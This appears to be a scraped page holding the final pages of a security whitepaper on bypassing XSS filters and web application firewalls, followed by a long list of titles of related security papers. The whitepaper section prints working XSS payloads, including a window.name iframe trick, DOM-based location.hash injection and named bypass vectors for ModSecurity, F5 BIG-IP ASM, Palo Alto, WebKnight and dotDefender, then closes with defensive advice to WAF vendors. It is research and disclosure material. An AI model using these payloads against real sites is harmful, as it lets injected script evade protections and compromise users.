30 5.2.3 Window.name Trick The name object represents the name of the window, in a scenario where we are able to load page inside an iframe we are able to control the name part of the window which we can use to execute JavaScript and along with it also bypass payload length restrictions, so again assuming that we are able to frame a website and are not able to inject javascript:alert(1). POC <iframesrc=' autofocus/aaaaa onfocus=location=window.name//' name="javascript:alert("xss")"></iframe> The location parameter is equal to window.name and since we control the name property we set the name equal to javascript:alert( XSS ) and hence we are able to execute JavaScript. 6.1 DOM Based XSS The server side filters fail against DOM Based XSS, the reason being is that inside of DOM based XSS the xss vector is always executed on the client side. Let s take a look the simplest example: <script> vari=location.hash; document.write(i); </script> The above JavaScript takes input from location.hash and anything passed after location.hash is not sent to the server, in the very next the user based input is directly printed to the DOM using document.write property without any escaping of the JavaScript. This would result in a DOM Based XSS. In certain cases we can convert a reflected XSS into a DOM based XSS vulnerability to avoid filter bypass, let s take a look at the following POC: ash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.has h[3]//#:() The above POC would only work if [and. and + is allowed, we can use location.hash to inject all the disallowed characters. Inside the above scenario the characters (,) and : were disallowed, however [,. and + were allowed. Therefore, we used inserted location.hash[index] at the place where we wanted to inject our disallowed characters. Location.hash[1] = : // Defined at the first position after the hash. R h a i n f o s e c. c o m Page 30
31 Location.hash[2]= ( // Defined at the second position after the hash. Location.hash[3] = ) // Defined at third position after the hash. The only obstacle against DOM Based XSS are the Client side XSS filters, however that my friends is a different story, we will take a look at methods to bypassing them inside a separate paper. 7.1 Bypasses By tweaking the payloads mentioned inside the cheat sheet, we were able to bypass most of the popular WAF s. We have decided not to make some of them public until they get fixed as it would be against the ethics ModSecurity s Bypass <scri%00pt>confirm(0);</scri%00pt> <a/onmouseover[\x0b]=location='\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x61\x6c\x6 5\x72\x74\x28\x30\x29\x3B'>rhainfosec Reference: WEB KNIGHT BYPASS <isindex action=j&tab;a&tab;vas&tab;c&tab;r&tab;ipt:alert(1) type=image> <marquee/onstart=confirm(2)> F5 BIG IP ASM and Palo ALTO Bypass <table background="javascript:alert(1)"></table> The above vector only works in IE6 and older versions of opera, at the time of writing we do have another valid vector for F5, BIG IP ASM and Palo ALTO that would execute javascript across modern browsers. However, the vendors are still fixing it so we decided not to make it public. Here is another bypass for F5 BIG IP ASM: /><marquee onfinish=confirm(123)>a</marquee> Dot Defender Bypass <svg/onload=prompt(1);> R h a i n f o s e c. c o m Page 31
32 <isindex action="javas&tab;cript:alert(1)" type=image> <marquee/onstart=confirm(2)> Conclusion Hence, it s concluded that Blacklisting is never the perfect solution; blacklisting saves time however makes the application more vulnerable than whitelisting. We would like to recommend the following best practices to the WAF vendors. 1) Developers and administrators should always keep in mind that a WAF is only a sticking plaster which should be used for a defined time-manner for a known vulnerable controller/param until the vulnerability has been patched inside the source code. 2) It is very important to keep the signatures for the WAF up to date and test new signatures before going live to ensure that work as expected. 3) A WAF can only help one if they are configured with the signatures needed for the particular controller/parameter, therefore it would need manual definitions like expected value type, min/max content-length, content-type and so one for each of this parameters to ensure that the WAF knows when to block or alarm with intrusive requests. 4) If a WAF relies upon blacklist, you should make sure that it is capable of blocking well known browsers bugs by keeping your signatures up-to-date and verifying that the WAF maintainers release new signatures regularly. R h a i n f o s e c. c o m Page 32
33 References R h a i n f o s e c. c o m Page 33
Playing with Web Application Firewalls
Playing with Web Application Firewalls DEFCON 16, August 8-10, 2008, Las Vegas, NV, USA Who is Wendel Guglielmetti Henrique? Penetration Test analyst at SecurityLabs - Intruders Tiger Team Security division
Playing with Web Application Firewalls
Playing with Web Application Firewalls Who is Wendel? Independent penetration test analyst. Affiliated to Hackaholic team. Over 7 years in the security industry. Discovered vulnerabilities in Webmails,
Acunetix Website Audit. 5 November, 2014. Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build 20120808)
Acunetix Website Audit 5 November, 2014 Developer Report Generated by Acunetix WVS Reporter (v8.0 Build 20120808) Scan of http://filesbi.go.id:80/ Scan details Scan information Starttime 05/11/2014 14:44:06
Web Application Firewall Profiling and Evasion. Michael Ritter Cyber Risk Services Deloitte
Web Application Firewall Profiling and Evasion Michael Ritter Cyber Risk Services Deloitte Content 1. Introduction 2. WAF Basics 3. Identifying a WAF 4. WAF detection tools 5. WAF bypassing methods 6.
EVADING ALL WEB-APPLICATION FIREWALLS XSS FILTERS
EVADING ALL WEB-APPLICATION FIREWALLS XSS FILTERS SEPTEMBER 2015 MAZIN AHMED [email protected] @MAZEN160 Table of Contents Topic Page Number Abstract 3 Introduction 3 Testing Environment 4 Products
Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh
Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP
Intrusion detection for web applications
Intrusion detection for web applications Intrusion detection for web applications Łukasz Pilorz Application Security Team, Allegro.pl Reasons for using IDS solutions known weaknesses and vulnerabilities
Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant
Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant Nethemba All About Security Highly experienced certified IT security experts (CISSP, C EH, SCSecA) Core
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development
reference: HTTP: The Definitive Guide by David Gourley and Brian Totty (O Reilly, 2002)
1 cse879-03 2010-03-29 17:23 Kyung-Goo Doh Chapter 3. Web Application Technologies reference: HTTP: The Definitive Guide by David Gourley and Brian Totty (O Reilly, 2002) 1. The HTTP Protocol. HTTP = HyperText
XSS Lightsabre techniques. using Hackvertor
XSS Lightsabre techniques using Hackvertor What is Hackvertor? Tag based conversion tool Javascript property checker Javascript/HTML execution DOM browser Saves you writing code Free and no ads! Whoo hoo!
Security-Assessment.com White Paper Leveraging XSRF with Apache Web Server Compatibility with older browser feature and Java Applet
Security-Assessment.com White Paper Leveraging XSRF with Apache Web Server Compatibility with older browser feature and Java Applet Prepared by: Roberto Suggi Liverani Senior Security Consultant Security-Assessment.com
Implementation of Web Application Firewall
Implementation of Web Application Firewall OuTian 1 Introduction Abstract Web 層 應 用 程 式 之 攻 擊 日 趨 嚴 重, 而 國 內 多 數 企 業 仍 不 知 該 如 何 以 資 安 設 備 阻 擋, 仍 在 採 購 傳 統 的 Firewall/IPS,
Cyber Security Workshop Ethical Web Hacking
Cyber Security Workshop Ethical Web Hacking May 2015 Setting up WebGoat and Burp Suite Hacking Challenges in WebGoat Concepts in Web Technologies and Ethical Hacking 1 P a g e Downloading WebGoat and Burp
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework
Detecting and Exploiting XSS with Xenotix XSS Exploit Framework [email protected] keralacyberforce.in Introduction Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s.
Cross-Site Scripting
Cross-Site Scripting (XSS) Computer and Network Security Seminar Fabrice Bodmer ([email protected]) UNIFR - Winter Semester 2006-2007 XSS: Table of contents What is Cross-Site Scripting (XSS)? Some
JOOMLA SECURITY. ireland website design. by Oliver Hummel. ADDRESS Unit 12D, Six Cross Roads Business Park, Waterford City
JOOMLA SECURITY by Oliver Hummel ADDRESS Unit 12D, Six Cross Roads Business Park, Waterford City CONTACT Nicholas Butler 051-393524 089-4278112 [email protected] Contents Introduction 3 Installation
Hypertext for Hyper Techs
Hypertext for Hyper Techs An Introduction to HTTP for SecPros Bio Josh Little, GSEC ~14 years in IT. Support, Server/Storage Admin, Webmaster, Web App Dev, Networking, VoIP, Projects, Security. Currently
Web Application Firewall Bypassing
Web Application Firewall Bypassing how to defeat the blue team KHALIL BIJJOU CYBER RISK SERVICES DELOITTE 29 th Octobre 2015 STRUCTURE Motivation & Objective Introduction to Web Application Firewalls Bypassing
Protocol-Level Evasion of Web Application Firewalls
Protocol-Level Evasion of Web Application Firewalls USA2012 Ivan Ristic Director of Engineering True Evasion Story Once, a long time ago, I evaded a web application firewall by adding a single character
Recent Advances in Web Application Security
Recent Advances in Web Application Security Author: Neelay S Shah Principal Security Consultant Foundstone Professional Services Table of Contents Introduction 3 Content Security Policy 3 Best Practices
Web Application Firewalls: What the vendors do NOT want you to know SHAKACON III
Web Application Firewalls: What the vendors do NOT want you to know $ whois WendelGH PT Consultant at Trustwave's SpiderLabs. Over 7 years in the security industry. Vulnerability discovery Webmails, AP,
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
1 Web Application Firewalls implementations, common problems and vulnerabilities
Bypassing Web Application Firewalls Pavol Lupták [email protected] CEO, Nethemba s.r.o Abstract The goal of the presentation is to describe typical obfuscation attacks that allow an attacker to
Finding XSS in Real World
Finding XSS in Real World by Alexander Korznikov [email protected] 1 April 2015 Hi there, in this tutorial, I will try to explain how to find XSS in real world, using some interesting techniques. All
Some Notes on Web Application Firewalls
Some Notes on Web Application Firewalls or Why You still Get Owned #whoami Member of Application Security Team, ERNW GmbH Contact: ERNW GmbH Frank Block Breslauer Str. 28 69124 Heidelberg Email: [email protected]
Project 2: Web Security Pitfalls
EECS 388 September 19, 2014 Intro to Computer Security Project 2: Web Security Pitfalls Project 2: Web Security Pitfalls This project is due on Thursday, October 9 at 6 p.m. and counts for 8% of your course
Blackbox Reversing of XSS Filters
Blackbox Reversing of XSS Filters Alexander Sotirov [email protected] Introduction Web applications are the future Reversing web apps blackbox reversing very different environment and tools Cross-site scripting
Where every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
HTTP Response Splitting
The Attack HTTP Response Splitting is a protocol manipulation attack, similar to Parameter Tampering The attack is valid only for applications that use HTTP to exchange data Works just as well with HTTPS
Information Extraction Art of Testing Network Peripheral Devices
OWASP AppSec Brazil 2010, Campinas, SP The OWASP Foundation http://www.owasp.org Information Extraction Art of Testing Network Peripheral Devices Aditya K Sood, SecNiche Security ([email protected])
Advanced Web Security, Lab
Advanced Web Security, Lab Web Server Security: Attacking and Defending November 13, 2013 Read this earlier than one day before the lab! Note that you will not have any internet access during the lab,
Universal XSS via IE8s XSS Filters
Universal XSS via IE8s XSS Filters the sordid tale of a wayward hash sign slides: http://p42.us/ie8xss/ About Us Eduardo Vela Nava aka sirdarckcat http://sirdarckcat.net http://twitter.com/sirdarckcat
Webapps Vulnerability Report
Tuesday, May 1, 2012 Webapps Vulnerability Report Introduction This report provides detailed information of every vulnerability that was found and successfully exploited by CORE Impact Professional during
WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
Detect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map
Detect and Sanitise Encoded Cross-Site Scripting and SQL Injection Attack Strings Using a Hash Map Erwin Adi and Irene Salomo School of Computer Science BINUS International BINUS University, Indonesia
Check list for web developers
Check list for web developers Requirement Yes No Remarks 1. Input Validation 1.1) Have you done input validation for all the user inputs using white listing and/or sanitization? 1.2) Does the input validation
Web Application Firewalls Evaluation and Analysis. University of Amsterdam System & Network Engineering MSc
Web Application Firewalls Evaluation and Analysis Andreas Karakannas [email protected] George Thessalonikefs [email protected] University of Amsterdam System & Network Engineering MSc
A Tale of the Weaknesses of Current Client-side XSS Filtering
A Tale of the Weaknesses of Current Client-side XSS Filtering Sebastian Lekies (@sebastianlekies), Ben Stock (@kcotsneb) and Martin Johns (@datenkeller) Attention hackers! These slides are preliminary!
Hack Yourself First. Troy Hunt @troyhunt troyhunt.com [email protected]
Hack Yourself First Troy Hunt @troyhunt troyhunt.com [email protected] We re gonna turn you into lean, mean hacking machines! Because if we don t, these kids are going to hack you Jake Davies, 19 (and
Cross Site Scripting (XSS) and PHP Security. Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011
Cross Site Scripting (XSS) and PHP Security Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011 What Is Cross Site Scripting? Injecting Scripts Into Otherwise Benign and Trusted Browser Rendered
STOPPING LAYER 7 ATTACKS with F5 ASM. Sven Müller Security Solution Architect
STOPPING LAYER 7 ATTACKS with F5 ASM Sven Müller Security Solution Architect Agenda Who is targeted How do Layer 7 attacks look like How to protect against Layer 7 attacks Building a security policy Layer
Input Validation Vulnerabilities, Encoded Attack Vectors and Mitigations OWASP. The OWASP Foundation. Marco Morana & Scott Nusbaum
Input Validation Vulnerabilities, Encoded Attack Vectors and Mitigations Marco Morana & Scott Nusbaum Cincinnati Chapter September 08 Meeting Copyright 2008 The Foundation Permission is granted to copy,
HTML5. Eoin Keary CTO BCC Risk Advisory. www.bccriskadvisory.com www.edgescan.com
HTML5 Eoin Keary CTO BCC Risk Advisory www.bccriskadvisory.com www.edgescan.com Where are we going? WebSockets HTML5 AngularJS HTML5 Sinks WebSockets: Full duplex communications between client or server
Barracuda Web Application Firewall vs. Intrusion Prevention Systems (IPS) Whitepaper
Barracuda Web Application Firewall vs. Intrusion Prevention Systems (IPS) Whitepaper Securing Web Applications As hackers moved from attacking the network to attacking the deployed applications, a category
STABLE & SECURE BANK lab writeup. Page 1 of 21
STABLE & SECURE BANK lab writeup 1 of 21 Penetrating an imaginary bank through real present-date security vulnerabilities PENTESTIT, a Russian Information Security company has launched its new, eighth
Web Security Threat Report: January April 2007. Ryan C. Barnett WASC Member Project Lead: Distributed Open Proxy Honeypots
Web Security Threat Report: January April 2007 Ryan C. Barnett WASC Member Project Lead: Distributed Open Proxy Honeypots What are we reporting? We are presenting real, live web attack data captured in-the-wild.
Chapter 7. Web Application Firewall
Chapter 7. Web Application Firewall IMS784(침입탐지시스템) Spring, 2011 Prof. H. K. Kim 1 Agenda I. Remind for term project II. Web security threats III. Web application Firewall IV. Practical recommendations
Cross Site Scripting Prevention
Project Report CS 649 : Network Security Cross Site Scripting Prevention Under Guidance of Prof. Bernard Menezes Submitted By Neelamadhav (09305045) Raju Chinthala (09305056) Kiran Akipogu (09305074) Vijaya
T14 SECURITY TESTING: ARE YOU A DEER IN THE HEADLIGHTS? Ryan English SPI Dynamics Inc BIO PRESENTATION. Thursday, May 18, 2006 1:30PM
BIO PRESENTATION T14 Thursday, May 18, 2006 1:30PM SECURITY TESTING: ARE YOU A DEER IN THE HEADLIGHTS? Ryan English SPI Dynamics Inc International Conference On Software Testing Analysis and Review May
Bypassing Internet Explorer s XSS Filter
Bypassing Internet Explorer s XSS Filter Or: Oops, that s not supposed to happen. Carlos @RTWaysea About Me Mechanical Drafting Background Engine parts, Architectural fixtures, etc. Friend said Try This
Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek ([email protected])
Bug Report Date: March 19, 2011 Reporter: Chris Jarabek ([email protected]) Software: Kimai Version: 0.9.1.1205 Website: http://www.kimai.org Description: Kimai is a web based time-tracking application.
Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks. Whitepaper
Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks Whitepaper The security industry has extensively focused on protecting against malicious injection attacks like
Cyber Security Challenge Australia 2014
Cyber Security Challenge Australia 2014 www.cyberchallenge.com.au CySCA2014 Web Penetration Testing Writeup Background: Pentest the web server that is hosted in the environment at www.fortcerts.cysca Web
Carlos Muñoz Application Security Engineer WhiteHat Security @RTWaysea
Carlos Muñoz Application Security Engineer WhiteHat Security @RTWaysea Bypass: History Explanation: What Is Going On Process: Things To Look For Demos: alert(1) Done Live (hopefully) CSP: Content Security
Creating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
[state of the internet] / SEO Attacks. Threat Advisory: Continuous Uptick in SEO Attacks
TLP: GREEN Issue Date: 1.12.16 Threat Advisory: Continuous Uptick in SEO Attacks Risk Factor High The Akamai Threat Research Team has identified a highly sophisticated Search Engine Optimization (SEO)
Finding Your Way in Testing Jungle. A Learning Approach to Web Security Testing.
Finding Your Way in Testing Jungle A Learning Approach to Web Security Testing. Research Questions Why is it important to improve website security? What techniques are already in place to test security?
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security
Is Drupal secure? A high-level perspective on web vulnerabilities, Drupal s solutions, and how to maintain site security Presented 2009-05-29 by David Strauss Thinking Securely Security is a process, not
Application security testing: Protecting your application and data
E-Book Application security testing: Protecting your application and data Application security testing is critical in ensuring your data and application is safe from security attack. This ebook offers
A Tale of the Weaknesses of Current Client-Side XSS Filtering
Call To Arms: A Tale of the Weaknesses of Current Client-Side XSS Filtering Martin Johns, Ben Stock, Sebastian Lekies About us Martin Johns, Ben Stock, Sebastian Lekies Security Researchers at SAP, Uni
Web Application Guidelines
Web Application Guidelines Web applications have become one of the most important topics in the security field. This is for several reasons: It can be simple for anyone to create working code without security
EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke
EVALUATING COMMERCIAL WEB APPLICATION SECURITY By Aaron Parke Outline Project background What and why? Targeted sites Testing process Burp s findings Technical talk My findings and thoughts Questions Project
Divide and Conquer Real World Distributed Port Scanning
Divide and Conquer Real World Distributed Port Scanning Ofer Maor CTO Hacktics 16 Feb 2006 Hackers & Threats I, 3:25PM (HT1-302) Introduction Divide and Conquer: Real World Distributed Port Scanning reviews
Security Research Advisory IBM inotes 9 Active Content Filtering Bypass
Security Research Advisory IBM inotes 9 Active Content Filtering Bypass Table of Contents SUMMARY 3 VULNERABILITY DETAILS 3 TECHNICAL DETAILS 4 LEGAL NOTICES 7 Active Content Filtering Bypass Advisory
How To Fix A Web Application Security Vulnerability
Proposal of Improving Web Application Security in Context of Latest Hacking Trends RADEK VALA, ROMAN JASEK Department of Informatics and Artificial Intelligence Tomas Bata University in Zlin, Faculty of
Advanced XSS. Nicolas Golubovic
Advanced XSS Nicolas Golubovic Image courtesy of chanpipat / FreeDigitalPhotos.net Today's menu 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course:
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange
3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) [email protected] Open Web Application Security Project http://www.owasp.org
Semantic based Web Application Firewall (SWAF V 1.6) Operations and User Manual. Document Version 1.0
Semantic based Web Application Firewall (SWAF V 1.6) Operations and User Manual Document Version 1.0 Table of Contents 1 SWAF... 4 1.1 SWAF Features... 4 2 Operations and User Manual... 7 2.1 SWAF Administrator
Web Application Security
E-SPIN PROFESSIONAL BOOK Vulnerability Management Web Application Security ALL THE PRACTICAL KNOW HOW AND HOW TO RELATED TO THE SUBJECT MATTERS. COMBATING THE WEB VULNERABILITY THREAT Editor s Summary
Web Application Firewalls: What the vendors do NOT want you to know. The OWASP Foundation http://www.owasp.org
Web Application Firewalls: What the vendors do NOT want you to know Sandro Gauci EnableSecurity [email protected] nd Wendel G. Henrique Trustwave [email protected] Copyright The OWASP Foundation
We protect you applications! No, you don t. Digicomp Hacking Day 2013 May 16 th 2013
We protect you applications! No, you don t Digicomp Hacking Day 2013 May 16 th 2013 Sven Vetsch Partner & CTO at Redguard AG www.redguard.ch Specialized in Application Security (Web, Web-Services, Mobile,
Security starts in the head(er)
Security starts in the head(er) JavaOne 2014 Dominik Schadow bridgingit Policies are independent of framework and language response.addheader(! "Policy name",! "Policy value"! ); User agent must understand
EECS 398 Project 2: Classic Web Vulnerabilities
EECS 398 Project 2: Classic Web Vulnerabilities Revision History 3.0 (October 27, 2009) Revise CSRF attacks 1 and 2 to make them possible to complete within the constraints of the project. Clarify that
dotdefender for IIS User Guide dotdefender for IIS - Manual Version 1.0
dotdefender for IIS User Guide dotdefender for IIS - Manual Version 1.0 Table of Contents Chapter 1 Introduction... 5 1.1 Overview... 5 1.2 Components... 5 1.3 Benefits... 6 1.4 Organization of this Guide...
Advanced Administration for Citrix NetScaler 9.0 Platinum Edition
Advanced Administration for Citrix NetScaler 9.0 Platinum Edition Course Length: 5 Days Course Code: CNS-300 Course Description This course provides the foundation to manage, configure and monitor advanced
Modern Web Development From Angle Brackets to Web Sockets
Modern Web Development From Angle Brackets to Web Sockets Pete Snyder Outline (or, what am i going to be going on about ) 1.What is the Web? 2.Why the web matters 3.What s unique about
COMP 112 Assignment 1: HTTP Servers
COMP 112 Assignment 1: HTTP Servers Lead TA: Jim Mao Based on an assignment from Alva Couch Tufts University Due 11:59 PM September 24, 2015 Introduction In this assignment, you will write a web server
Still Aren't Doing. Frank Kim
Ten Things Web Developers Still Aren't Doing Frank Kim Think Security Consulting Background Frank Kim Consultant, Think Security Consulting Security in the SDLC SANS Author & Instructor DEV541 Secure Coding
HTTPParameter Pollution. ChrysostomosDaniel
HTTPParameter Pollution ChrysostomosDaniel Introduction Nowadays, many components from web applications are commonly run on the user s computer (such as Javascript), and not just on the application s provider
How To Protect A Web Application From Attack From A Trusted Environment
Standard: Version: Date: Requirement: Author: PCI Data Security Standard (PCI DSS) 1.2 October 2008 6.6 PCI Security Standards Council Information Supplement: Application Reviews and Web Application Firewalls
Research of Web Real-Time Communication Based on Web Socket
Int. J. Communications, Network and System Sciences, 2012, 5, 797-801 http://dx.doi.org/10.4236/ijcns.2012.512083 Published Online December 2012 (http://www.scirp.org/journal/ijcns) Research of Web Real-Time
Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified
Standard: Data Security Standard (DSS) Requirement: 6.6 Date: February 2008 Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified Release date: 2008-04-15 General PCI
(WAPT) Web Application Penetration Testing
(WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:
Practical Exploitation Using A Malicious Service Set Identifier (SSID)
Practical Exploitation Using A Malicious Service Set Identifier (SSID) Deral Heiland Senior Security Engineer CDW Advanced Technology Services Mike Belton Technical Lead CDW Advanced Technology Services
Web Applications Testing
Web Applications Testing Automated testing and verification JP Galeotti, Alessandra Gorla Why are Web applications different Web 1.0: Static content Client and Server side execution Different components
Institutionen för datavetenskap
Institutionen för datavetenskap Department of Computer and Information Science Final thesis Generating web applications containing XSS and CSRF vulnerabilities by Gustav Ahlberg LIU-IDA/LITH-EX-A--14/054--SE
Testing Web Applications for SQL Injection Sam Shober [email protected]
Testing Web Applications for SQL Injection Sam Shober [email protected] Abstract: This paper discusses the SQL injection vulnerability, its impact on web applications, methods for pre-deployment and
WEB ATTACKS AND COUNTERMEASURES
WEB ATTACKS AND COUNTERMEASURES February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in
Web Application Security. Vulnerabilities, Weakness and Countermeasures. Massimo Cotelli CISSP. Secure
Vulnerabilities, Weakness and Countermeasures Massimo Cotelli CISSP Secure : Goal of This Talk Security awareness purpose Know the Web Application vulnerabilities Understand the impacts and consequences
2009-12-26 PST_WEBZINE_0X04. How to solve XSS and mix user's HTML/JavaScript code with your content with just one script
ACS - Active Content Signatures By Eduardo Vela Nava ACS - Active Content Signatures How to solve XSS and mix user's HTML/JavaScript code with your content with just one script Eduardo Vela Nava ([email protected])
Abusing HTML5. DEF CON 19 Ming Chow Lecturer, Department of Computer Science TuCs University Medford, MA 02155 [email protected]
Abusing HTML5 DEF CON 19 Ming Chow Lecturer, Department of Computer Science TuCs University Medford, MA 02155 [email protected] What is HTML5? The next major revision of HTML. To replace XHTML? Yes Close
Client vs. Server Implementations of Mitigating XSS Security Threats on Web Applications
Journal of Basic and Applied Engineering Research pp. 50-54 Krishi Sanskriti Publications http://www.krishisanskriti.org/jbaer.html Client vs. Server Implementations of Mitigating XSS Security Threats
Web Application Hacking (Penetration Testing) 5-day Hands-On Course
Web Application Hacking (Penetration Testing) 5-day Hands-On Course Web Application Hacking (Penetration Testing) 5-day Hands-On Course Course Description Our web sites are under attack on a daily basis
